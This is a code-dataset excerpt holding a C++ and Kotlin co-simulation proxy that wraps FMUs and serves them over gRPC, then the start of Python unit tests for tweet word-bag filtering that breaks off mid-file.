this->modelDescription = shared_ptr<ModelDescription>(new ModelDescription());\n get_model_description(version, xml, *modelDescription);\n\n}\n\nshared_ptr<ModelDescription> FmuWrapper::getModelDescription() {\n return modelDescription;\n}\n\nshared_ptr<FmuInstance> FmuWrapper::newInstance() {\n\n fmi2_callback_functions_t callBackFunctions;\n callBackFunctions.logger = fmi2_log_forwarding;\n callBackFunctions.allocateMemory = std::calloc;\n callBackFunctions.freeMemory = std::free;\n callBackFunctions.componentEnvironment = nullptr;\n\n const char* model_identifier = fmi2_import_get_model_identifier_CS(xml);\n fmi2_import_t* fmu = load_model_description(tmp_path.c_str(), ctx, callbacks);\n\n jm_status_enu_t status = fmi2_import_create_dllfmu(fmu, fmi2_fmu_kind_cs, &callBackFunctions);\n if (status == jm_status_error) {\n string error_msg = \"Could not create the DLL loading mechanism(C-API) (error: \" + string(fmi2_import_get_last_error(fmu)) + \")\";\n __throw_runtime_error(error_msg.c_str());\n }\n\n jm_status_enu_t jmstatus = fmi2_import_instantiate(\n fmu, model_identifier, fmi2_cosimulation, nullptr, false);\n if (jmstatus == jm_status_error) {\n __throw_runtime_error(\"fmi2_import_instantiate failed!\");\n }\n\n return shared_ptr<FmuInstance>(new FmuInstance(fmu));\n\n}\n\nFmuWrapper::~FmuWrapper() {\n\n cout << \"FmuWrapper destructor called\" << endl;\n\n fmi_import_free_context(this->ctx);\n remove_all(this->tmp_path);\n\n}\n\nFmuInstance::FmuInstance(fmi2_import_t *fmu) {\n this->instance = fmu;\n}\n\nvoid FmuInstance::init(double start, double stop) {\n\n fmi2_boolean_t stop_time_defined = start < stop;\n fmi2_status_t status = fmi2_import_setup_experiment(instance, fmi2_true,\n RELTOL, start, stop_time_defined, stop);\n if(status != fmi2_status_ok) {\n __throw_runtime_error(\"fmi2_import_setup_experiment failed\");\n }\n\n status = fmi2_import_enter_initialization_mode(instance);\n if(status != fmi2_status_ok) {\n __throw_runtime_error(\"fmi2_import_enter_initialization_mode failed\");\n }\n\n status = fmi2_import_exit_initialization_mode(instance);\n if(status != fmi2_status_ok) {\n __throw_runtime_error(\"fmi2_import_exit_initialization_mode failed\");\n }\n\n}\n\nvoid FmuInstance::step(double step_size, StepResult& result) {\n fmi2_status_t status = fmi2_import_do_step(\n instance, current_time, step_size, fmi2_true);\n current_time += step_size;\n\n result.status = thriftType(status);\n result.simulationTime = current_time;\n}\n\nStatus::type FmuInstance::reset() {\n fmi2_status_t status = fmi2_import_reset(instance);\n return thriftType(status);\n}\n\nStatus::type FmuInstance::terminate() {\n if (!terminated) {\n terminated = true;\n fmi2_status_t status = fmi2_import_terminate(instance);\n return thriftType(status);\n }\n}\n\nvoid FmuInstance::getInteger(unsigned int vr, IntegerRead& read) {\n int value;\n fmi2_status_t status = fmi2_import_get_integer(instance, &vr, 1, &value);\n read.value = value;\n read.status = thriftType(status);\n}\n\nvoid FmuInstance::getInteger(const char* name, IntegerRead& read) {\n fmi2_import_variable_t* var = fmi2_import_get_variable_by_name(instance, name);\n fmi2_value_reference_t vr = fmi2_import_get_variable_vr(var);\n getInteger(vr, read);\n}\n\nvoid FmuInstance::getReal(unsigned int vr, RealRead& read) {\n double value;\n fmi2_status_t status = fmi2_import_get_real(instance, &vr, 1, &value);\n read.value = value;\n read.status = thriftType(status);\n}\n\nvoid FmuInstance::getReal(const char* name, RealRead& read) {\n fmi2_import_variable_t* var = fmi2_import_get_variable_by_name(instance, name);\n fmi2_value_reference_t vr = fmi2_import_get_variable_vr(var);\n getReal(vr, read);\n}\n\nvoid FmuInstance::getString(unsigned int vr, StringRead& read) {\n const char* value;\n fmi2_status_t status = fmi2_import_get_string(instance, &vr, 1, &value);\n read.value = value;\n read.status = thriftType(status);\n}\n\nvoid FmuInstance::getString(const char* name, StringRead& read) {\n fmi2_import_variable_t* var = fmi2_import_get_variable_by_name(instance, name);\n fmi2_value_reference_t vr = fmi2_import_get_variable_vr(var);\n getString(vr, read);\n}\n\nvoid FmuInstance::getBoolean(unsigned int vr, BooleanRead& read) {\n int value;\n fmi2_status_t status = fmi2_import_get_boolean(instance, &vr, 1, &value);\n read.value == value;\n read.status = thriftType(status);\n}\n\nvoid FmuInstance::getBoolean(const char* name, BooleanRead& read) {\n fmi2_import_variable_t* var = fmi2_import_get_variable_by_name(instance, name);\n fmi2_value_reference_t vr = fmi2_import_get_variable_vr(var);\n getBoolean(vr, read);\n}\n\nFmuInstance::~FmuInstance() {\n\n cout << \"FmuInstance destructor called\" << endl;\n\n terminate();\n fmi2_import_destroy_dllfmu(instance);\n fmi2_import_free(instance);\n\n}\n\n\n\n\n\n" }, { "alpha_fraction": 0.6737967729568481, "alphanum_fraction": 0.678141713142395, "avg_line_length": 25.945945739746094, "blob_id": "383c381314a70962efc3a52b0231eef93cba570c", "content_id": "559f5706aba204b78c7fd04280e2c8c0d9d8352c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2992, "license_type": "permissive", "max_line_length": 81, "num_lines": 111, "path": "/cpp/FMU-proxy/common/FmuWrapper.h", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\n#ifndef FMU_PROXY_FMUWRAPPER_H\n#define FMU_PROXY_FMUWRAPPER_H\n\n#include <fmilib.h>\n#include <boost/filesystem.hpp>\n#include \"thrift-gen/definitions_types.h\"\n\nusing namespace std;\nusing namespace boost::filesystem;\nusing namespace ::fmuproxy::thrift;\n\nnamespace fmuproxy {\n\n class FmuInstance {\n\n private:\n\n fmi2_import_t *instance;\n\n double current_time = 0.0;\n bool terminated = false;\n\n public:\n FmuInstance(fmi2_import_t* fmu);\n\n void init(double start, double end);\n\n void step(double step_size, StepResult& result);\n\n Status::type reset();\n\n Status::type terminate();\n\n double getCurrentTime() {\n return current_time;\n }\n\n bool isTerminated() {\n return terminated;\n }\n\n void getInteger(unsigned int vr, IntegerRead& read);\n void getInteger(const char *name, IntegerRead& read);\n\n void getReal(unsigned int vr, RealRead& read);\n void getReal(const char *name, RealRead& read);\n\n\n void getString(unsigned int vr, StringRead& read);\n void getString(const char *name, StringRead& read);\n\n void getBoolean(unsigned int vr, BooleanRead& read);\n void getBoolean(const char *name, BooleanRead& read);\n\n ~FmuInstance();\n\n };\n\n class FmuWrapper {\n\n private:\n\n path tmp_path;\n fmi2_import_t* xml;\n fmi_xml_context_t* ctx;\n jm_callbacks callbacks;\n fmi_version_enu_t version;\n\n shared_ptr<ModelDescription> modelDescription;\n\n public:\n FmuWrapper(const char *fmu_path);\n\n const char* getModelDescriptionXml();\n\n shared_ptr<ModelDescription> getModelDescription();\n\n shared_ptr<FmuInstance> newInstance();\n\n ~FmuWrapper();\n\n };\n\n}\n\n\n#endif //FMU_PROXY_FMUWRAPPER_H\n\n" }, { "alpha_fraction": 0.6442831158638, "alphanum_fraction": 0.6814882159233093, "avg_line_length": 34.51612854003906, "blob_id": "a2375ccdbebc5d6515e853fb229dcde60c5b4fad", "content_id": "4b70f3993d102bbbdc2d9161164f54d29c9b761f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 1102, "license_type": "permissive", "max_line_length": 120, "num_lines": 31, "path": "/java/FMU-proxy/fmu-proxy-gen/build.gradle", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "\napply plugin: 'kotlin'\napply plugin: 'application'\n\nmainClassName = 'no.mechatronics.sfi.fmuproxy.ApplicationStarter'\n\ndistributions {\n main {\n baseName = 'fmu-proxy-gen'\n applicationName = \"fmu-proxy-gen\"\n }\n}\n\ndef snapshot = true\ndef fmi4j_version = snapshot ? fmi4j_snapshot_version : fmi4j_stable_version\n\ndependencies {\n\n compile group: 'info.picocli', name: 'picocli', version: '2.3.0'\n compile group: 'org.jtwig', name: 'jtwig-core', version: '5.87.0.RELEASE'\n compile group: 'no.mechatronics.sfi.fmi4j', name: 'fmi-modeldescription', version: fmi4j_version, changing: snapshot\n\n testCompile group: 'io.grpc', name: 'grpc-stub', version: '1.11.0'\n testCompile group: 'io.grpc', name: 'grpc-netty', version: '1.11.0'\n testCompile group: 'io.grpc', name: 'grpc-protobuf', version: '1.11.0'\n\n implementation group: 'org.slf4j', name: 'slf4j-api', version: '1.7.25'\n runtime group: 'org.slf4j', name: 'slf4j-log4j12', version: '1.7.25'\n\n testCompile group: 'no.mechatronics.sfi.fmuproxy', name: 'fmu-proxy', version: '0.1-SNAPSHOT', changing: true\n\n}\n" }, { "alpha_fraction": 0.654013454914093, "alphanum_fraction": 0.6556515693664551, "avg_line_length": 37.903297424316406, "blob_id": "9a17427e5b8cbb1301c760cf54f94ba55b492c7f", "content_id": "ff98f08d9000d1f6c22cd0578fac1eb058200740", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 17703, "license_type": "permissive", "max_line_length": 204, "num_lines": 455, "path": "/java/FMU-proxy/fmu-proxy/src/main/kotlin/no/mechatronics/sfi/fmuproxy/grpc/services/GrpcFmuServiceImpl.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018. Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.grpc.services\n\nimport com.google.protobuf.Empty\nimport io.grpc.BindableService\nimport io.grpc.Status\nimport io.grpc.stub.StreamObserver\nimport no.mechatronics.sfi.fmi4j.common.FmiStatus\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport no.mechatronics.sfi.fmi4j.modeldescription.CoSimulationModelDescription\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmi4j.modeldescription.ModelExchangeModelDescription\nimport no.mechatronics.sfi.fmuproxy.fmu.Fmus\nimport no.mechatronics.sfi.fmuproxy.grpc.FmuServiceGrpc\nimport no.mechatronics.sfi.fmuproxy.grpc.GrpcFmuServer\nimport no.mechatronics.sfi.fmuproxy.grpc.Proto\nimport no.mechatronics.sfi.fmuproxy.solver.parseIntegrator\nimport org.apache.commons.math3.ode.FirstOrderIntegrator\nimport org.apache.commons.math3.ode.nonstiff.*\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\n\ninterface GrpcFmuService : BindableService {\n\n fun statusReply(status: FmiStatus, responseObserver: StreamObserver<Proto.StatusResponse>) {\n Proto.StatusResponse.newBuilder()\n .setStatus(status.protoType())\n .build().also {\n responseObserver.onNext(it)\n responseObserver.onCompleted()\n }\n }\n \n fun noSuchFmuReply(id: Int, responseObserver: StreamObserver<*>) {\n val message = \"No FMU with id=$id!\"\n responseObserver.onError(\n Status.INVALID_ARGUMENT\n .augmentDescription(\"FmuNotFoundException\")\n .withDescription(message)\n .asRuntimeException()\n )\n }\n\n}\n\n\nclass GrpcFmuServiceImpl(\n private val fmu: Fmu\n): FmuServiceGrpc.FmuServiceImplBase(), GrpcFmuService {\n\n private val modelDescription: CommonModelDescription\n = fmu.modelDescription\n\n override fun getModelDescription(request: Empty, responseObserver: StreamObserver<Proto.ModelDescription>) {\n responseObserver.onNext(modelDescription.protoType())\n responseObserver.onCompleted()\n }\n\n override fun getModelDescriptionXml(request: Empty, responseObserver: StreamObserver<Proto.Str>) {\n\n Proto.Str.newBuilder().setValue(fmu.modelDescriptionXml).build().also {\n responseObserver.onNext(it)\n responseObserver.onCompleted()\n }\n\n }\n\n override fun canGetAndSetFMUstate(req: Proto.UInt, responseObserver: StreamObserver<Proto.Bool>) {\n val fmuId = req.value\n Fmus.get(fmuId)?.apply {\n val md = modelDescription\n val canGetAndSetFMUstate = when (md) {\n is CoSimulationModelDescription -> md.canGetAndSetFMUstate\n is ModelExchangeModelDescription -> md.canGetAndSetFMUstate\n else -> throw AssertionError(\"ModelDescription is not of type CS or ME?\")\n }\n responseObserver.onNext(canGetAndSetFMUstate.protoType())\n responseObserver.onCompleted()\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun getCurrentTime(req: Proto.UInt, responseObserver: StreamObserver<Proto.Real>) {\n\n val fmuId = req.value\n Fmus.get(fmuId)?.apply {\n responseObserver.onNext(currentTime.protoType())\n responseObserver.onCompleted()\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun isTerminated(req: Proto.UInt, responseObserver: StreamObserver<Proto.Bool>) {\n\n val fmuId = req.value\n Fmus.get(req.value)?.apply {\n responseObserver.onNext(isTerminated.protoType())\n responseObserver.onCompleted()\n }?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun readInteger(req: Proto.ReadRequest, responseObserver: StreamObserver<Proto.IntRead>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val valueReference = req.valueReference\n val read = variableAccessor.readInteger(valueReference)\n responseObserver.onNext(Proto.IntRead.newBuilder()\n .setValue(read.value)\n .setStatus(read.status.protoType())\n .build())\n responseObserver.onCompleted()\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun bulkReadInteger(req: Proto.BulkReadRequest, responseObserver: StreamObserver<Proto.IntListRead>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val builder = Proto.IntListRead.newBuilder()\n val read = variableAccessor.readInteger(req.valueReferencesList.toIntArray())\n builder.status = read.status.protoType()\n for (value in read.value) {\n builder.addValues(value)\n }\n responseObserver.onNext(builder.build())\n responseObserver.onCompleted()\n }?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun readReal(req: Proto.ReadRequest, responseObserver: StreamObserver<Proto.RealRead>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val valueReference = req.valueReference\n val read = variableAccessor.readReal(valueReference)\n responseObserver.onNext(Proto.RealRead.newBuilder()\n .setValue(read.value)\n .setStatus(read.status.protoType())\n .build())\n responseObserver.onCompleted()\n }?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun bulkReadReal(req: Proto.BulkReadRequest, responseObserver: StreamObserver<Proto.RealListRead>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val builder = Proto.RealListRead.newBuilder()\n val read = variableAccessor.readReal(req.valueReferencesList.toIntArray())\n builder.status = read.status.protoType()\n for (value in read.value) {\n builder.addValues(value)\n }\n responseObserver.onNext(builder.build())\n responseObserver.onCompleted()\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun readString(req: Proto.ReadRequest, responseObserver: StreamObserver<Proto.StrRead>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val read = variableAccessor.readString(req.valueReference)\n responseObserver.onNext(Proto.StrRead.newBuilder()\n .setValue(read.value)\n .setStatus(read.status.protoType())\n .build())\n responseObserver.onCompleted()\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun bulkReadString(req: Proto.BulkReadRequest, responseObserver: StreamObserver<Proto.StrListRead>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val builder = Proto.StrListRead.newBuilder()\n val read = variableAccessor.readString(req.valueReferencesList.toIntArray())\n builder.status = read.status.protoType()\n for (value in read.value) {\n builder.addValues(value)\n }\n responseObserver.onNext(builder.build())\n responseObserver.onCompleted()\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun readBoolean(req: Proto.ReadRequest, responseObserver: StreamObserver<Proto.BoolRead>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val read = variableAccessor.readBoolean(req.valueReference)\n responseObserver.onNext(Proto.BoolRead.newBuilder()\n .setValue(read.value)\n .setStatus(read.status.protoType())\n .build())\n responseObserver.onCompleted()\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun bulkReadBoolean(req: Proto.BulkReadRequest, responseObserver: StreamObserver<Proto.BoolListRead>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val builder = Proto.BoolListRead.newBuilder()\n val read = variableAccessor.readBoolean(req.valueReferencesList.toIntArray())\n builder.status = read.status.protoType()\n for (value in read.value) {\n builder.addValues(value)\n }\n responseObserver.onNext(builder.build())\n responseObserver.onCompleted()\n } ?: noSuchFmuReply(fmuId, responseObserver)\n \n\n }\n\n override fun writeInteger(req: Proto.WriteIntRequest, responseObserver: StreamObserver<Proto.StatusResponse>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val status = variableAccessor.writeInteger(req.valueReference, req.value)\n statusReply(status, responseObserver)\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun bulkWriteInteger(req: Proto.BulkWriteIntRequest, responseObserver: StreamObserver<Proto.StatusResponse>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val status = variableAccessor.writeInteger(req.valueReferencesList.toIntArray(), req.valuesList.toIntArray())\n statusReply(status, responseObserver)\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun writeReal(req: Proto.WriteRealRequest, responseObserver: StreamObserver<Proto.StatusResponse>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val status = variableAccessor.writeReal(req.valueReference, req.value)\n statusReply(status, responseObserver)\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n\n }\n\n override fun bulkWriteReal(req: Proto.BulkWriteRealRequest, responseObserver: StreamObserver<Proto.StatusResponse>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val status = variableAccessor.writeReal(req.valueReferencesList.toIntArray(), req.valuesList.toDoubleArray())\n statusReply(status, responseObserver)\n } ?: statusReply(FmiStatus.Error, responseObserver)\n\n }\n\n override fun writeString(req: Proto.WriteStrRequest, responseObserver: StreamObserver<Proto.StatusResponse>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val status = variableAccessor.writeString(req.valueReference, req.value)\n statusReply(status, responseObserver)\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n\n }\n\n override fun bulkWriteString(req: Proto.BulkWriteStrRequest, responseObserver: StreamObserver<Proto.StatusResponse>) {\n\n val fmuId = req.fmuId\n Fmus.get(req.fmuId)?.apply {\n val status = variableAccessor.writeString(req.valueReferencesList.toIntArray(), req.valuesList.toTypedArray())\n statusReply(status, responseObserver)\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun writeBoolean(req: Proto.WriteBoolRequest, responseObserver: StreamObserver<Proto.StatusResponse>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val status = variableAccessor.writeBoolean(req.valueReference, req.value)\n statusReply(status, responseObserver)\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n\n }\n\n override fun bulkWriteBoolean(req: Proto.BulkWriteBoolRequest, responseObserver: StreamObserver<Proto.StatusResponse>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val status = variableAccessor.writeBoolean(req.valueReferencesList.toIntArray(), req.valuesList.toBooleanArray())\n statusReply(status, responseObserver)\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun init(req: Proto.InitRequest, responseObserver: StreamObserver<Proto.StatusResponse>) {\n\n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n val start = req.start\n val stop = req.stop\n val hasStart = start > 0\n val hasStop = stop > 0 && stop > start\n if (hasStart && hasStop) {\n init(start, stop)\n } else if (hasStart && hasStop) {\n init(start)\n } else {\n init()\n }\n statusReply(lastStatus, responseObserver)\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun step(req: Proto.StepRequest, responseObserver: StreamObserver<Proto.StepResult>) {\n \n val fmuId = req.fmuId\n Fmus.get(fmuId)?.apply {\n doStep(req.stepSize)\n Proto.StepResult.newBuilder()\n .setSimulationTime(currentTime)\n .setStatus(lastStatus.protoType())\n .build().also {\n responseObserver.onNext(it)\n responseObserver.onCompleted()\n }\n\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun terminate(req: Proto.UInt, responseObserver: StreamObserver<Proto.StatusResponse>) {\n\n val fmuId = req.value\n Fmus.remove(fmuId)?.apply {\n terminate()\n lastStatus.also { status ->\n LOG.debug(\"Terminated fmu with status: $status\")\n statusReply(status, responseObserver)\n }\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n override fun reset(req: Proto.UInt, responseObserver: StreamObserver<Proto.StatusResponse>) {\n\n val fmuId = req.value\n Fmus.get(fmuId)?.apply {\n reset().also {\n statusReply(lastStatus, responseObserver)\n }\n } ?: noSuchFmuReply(fmuId, responseObserver)\n\n }\n\n\n override fun createInstanceFromCS(req: Empty, responseObserver: StreamObserver<Proto.UInt>) {\n\n Fmus.put(fmu.asCoSimulationFmu().newInstance()).also { id ->\n Proto.UInt.newBuilder().setValue(id).build().also {\n responseObserver.onNext(it)\n responseObserver.onCompleted()\n }\n }\n\n }\n\n override fun createInstanceFromME(req: Proto.Solver, responseObserver: StreamObserver<Proto.UInt>) {\n\n fun selectDefaultIntegrator(): FirstOrderIntegrator {\n val stepSize = fmu.modelDescription.defaultExperiment?.stepSize ?: 1E-3\n LOG.warn(\"No valid integrator found.. Defaulting to Euler with $stepSize stepSize\")\n return EulerIntegrator(stepSize)\n }\n\n val integrator = parseIntegrator(req.name, req.settings) ?: selectDefaultIntegrator()\n Fmus.put(fmu.asModelExchangeFmu().newInstance(integrator)).also { id ->\n Proto.UInt.newBuilder().setValue(id).build().also {\n responseObserver.onNext(it)\n responseObserver.onCompleted()\n }\n }\n\n }\n\n// override fun createInstanceFromME(req: Proto.Integrator, responseObserver: StreamObserver<Proto.UInt>) {\n//\n// fun selectDefaultIntegrator(): FirstOrderIntegrator {\n// val stepSize = fmu.modelDescription.defaultExperiment?.stepSize ?: 1E-3\n// LOG.warn(\"No integrator specified.. Defaulting to Euler with $stepSize stepSize\")\n// return EulerIntegrator(stepSize)\n// }\n//\n// val integrator = when (req.integratorsCase) {\n// Proto.Integrator.IntegratorsCase.GILL -> GillIntegrator(req.gill.stepSize)\n// Proto.Integrator.IntegratorsCase.EULER -> EulerIntegrator(req.euler.stepSize)\n// Proto.Integrator.IntegratorsCase.MID_POINT -> MidpointIntegrator(req.midPoint.stepSize)\n// Proto.Integrator.IntegratorsCase.RUNGE_KUTTA -> ClassicalRungeKuttaIntegrator(req.rungeKutta.stepSize)\n// Proto.Integrator.IntegratorsCase.ADAMS_BASHFORTH -> req.adamsBashforth.let { AdamsBashforthIntegrator(it.nSteps, it.minStep, it.maxStep, it.scalAbsoluteTolerance, it.scalRelativeTolerance) }\n// Proto.Integrator.IntegratorsCase.DORMAND_PRINCE54 -> req.dormandPrince54.let { DormandPrince54Integrator(it.minStep, it.maxStep, it.scalAbsoluteTolerance, it.scalRelativeTolerance) }\n// else -> selectDefaultIntegrator()\n// }\n//\n// Fmus.put(fmu.asModelExchangeFmu().newInstance(integrator)).also { id ->\n// Proto.UInt.newBuilder().setValue(id).build().also {\n// responseObserver.onNext(it)\n// responseObserver.onCompleted()\n// }\n// }\n//\n// }\n\n\n private companion object {\n val LOG: Logger = LoggerFactory.getLogger(GrpcFmuServer::class.java)\n }\n\n}\n\n\n" } ]
59
williehammonds/TwitterDataAnalysis
https://github.com/williehammonds/TwitterDataAnalysis
96937ef7b042818773cdb490647aaa96971ee6ea
4b1d113a8b3843ccce9711102bfb013ac19b41d6
d1c912af79825ad0521a55ec9a033824043699af
refs/heads/master
2021-01-16T20:46:19.726823
2015-02-23T04:03:33
2015-02-23T04:03:33
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5670995712280273, "alphanum_fraction": 0.573720395565033, "avg_line_length": 39.49484634399414, "blob_id": "edd6e52ae5e6bb490bb8a7f9401504c1be78b131", "content_id": "7bd35a1bc7ec3307b6bf548e0dc5bdb760b7ff75", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3927, "license_type": "permissive", "max_line_length": 166, "num_lines": 97, "path": "/tests/test_TextTools.py", "repo_name": "williehammonds/TwitterDataAnalysis", "src_encoding": "UTF-8", "text": "import unittest\n\nimport nltk\n\nfrom TextAnalysis.TextTools import *\n\nclass TweetTextWordBagMakerTest(unittest.TestCase):\n def setUp(self):\n self.object = TweetTextWordBagMaker()\n\n def tearDown(self):\n self.object = ''\n\n def test_add_to_ignorelist(self):\n \"\"\"\n The tested function combines the lists, removes duplicates, and converts to a tuple\n \"\"\"\n #testlist1 = ['cat', 'fish']\n #testlist2 = ['cat', 'taco', 'burrito']\n #expect = ('cat', 'fish', 'taco', 'burrito')\n\n testlist1 = [1, 2]\n testlist2 = [2, 3, 4, 5]\n expect = (1, 2, 3, 4, 5)\n \n self.object.add_to_ignorelist(testlist1)\n #make sure adds to the list\n #t1 = list(self.object.ignore).sort()\n #self.assertListEqual(t1, testlist1.sort())\n self.object.add_to_ignorelist(testlist2)\n #make sure edited out the duplicates\n self.assertTupleEqual(self.object.ignore, expect)\n \n def test__make_wordbag(self):\n test = \"The quick brown fox became a delicious taco for the hungry cat. All lived happily ever after\"\n expect = [\"the\", \"quick\", \"brown\", \"fox\", \"became\", \"a\", \"delicious\", \"taco\", \"for\", \"the\", \"hungry\", \"cat\", \".\", \"all\", \"lived\", \"happily\", \"ever\", \"after\"]\n result = self.object._make_wordbag(test)\n self.assertListEqual(result, expect)\n \n def test__filter_ignored_terms(self):\n to_remove = ['dog', 'cow']\n test = ['cat', 'dog', 'fish', 'cow']\n expect = ['cat', 'fish']\n self.object.add_to_ignorelist(to_remove)\n result = self.object._filter_ignored_terms(test)\n self.assertListEqual(result, expect)\n \n def test__filter_usernames(self):\n test = ['taco', '@burrito', 'cat', '@dog']\n expect = ['taco', 'cat']\n result = self.object._filter_usernames(test)\n self.assertListEqual(result, expect)\n \n def test__filter_urls(self):\n test = ['taco', '//t.co', 'cat', '//t.co']\n expect = ['taco', 'cat']\n result = self.object._filter_urls(test)\n self.assertListEqual(result, expect)\n \n \n def test_process(self):\n test = [{'tweetID' : 1, 'tweetText' : \"The first tweet. It has text\"},\n {'tweetID' : 2, 'tweetText' : \"The quick brown fox became a delicious taco for the hungry cat. All lived happily ever after\"}]\n expect = [\"first\", \"tweet\", \"text\", \"quick\", \"brown\", \"fox\", \"became\", \"delicious\", \"taco\", \"hungry\", \"cat\",\n \"lived\", \"happily\", \"ever\"]\n self.object.add_to_ignorelist([\".\", \",\"])\n self.object.add_to_ignorelist(nltk.corpus.stopwords.words('english'))\n self.object.process(test)\n self.assertEqual(self.object.masterbag, expect)\n self.assertTupleEqual(self.object.tweet_tuples[0], (1, [\"first\", \"tweet\", \"text\"]))\n self.assertTupleEqual(self.object.tweet_tuples[1], (2, [\"quick\", \"brown\", \"fox\", \"became\", \"delicious\", \"taco\", \"hungry\", \"cat\", \"lived\", \"happily\", \"ever\"]))\n\n\nclass WordFiltersTest(unittest.TestCase):\n def setUp(self):\n self.object = WordFilters()\n\n def tearDown(self):\n self.object = ''\n \n def test_remove_fragments(self):\n test = ['cat', 'dog', \"amp\", '...', '//t.co', \"'re'\", \"'m\", 'fish', \"'s\", 'cow']\n expect = ['cat', 'dog', 'fish', 'cow']\n result = self.object.remove_fragments(test)\n self.assertListEqual(result, expect)\n \n def test_remove_punctuation(self):\n test = ['cat', 'dog', \"&\", '.', '/', \"'\", \"!\", 'fish', \"#\", 'cow']\n expect = ['cat', 'dog', 'fish', 'cow']\n result = self.object.remove_punctuation(test)\n self.assertListEqual(result, expect)\n \n def test_filter_stopwords(self):\n test = ['taco', 'a', 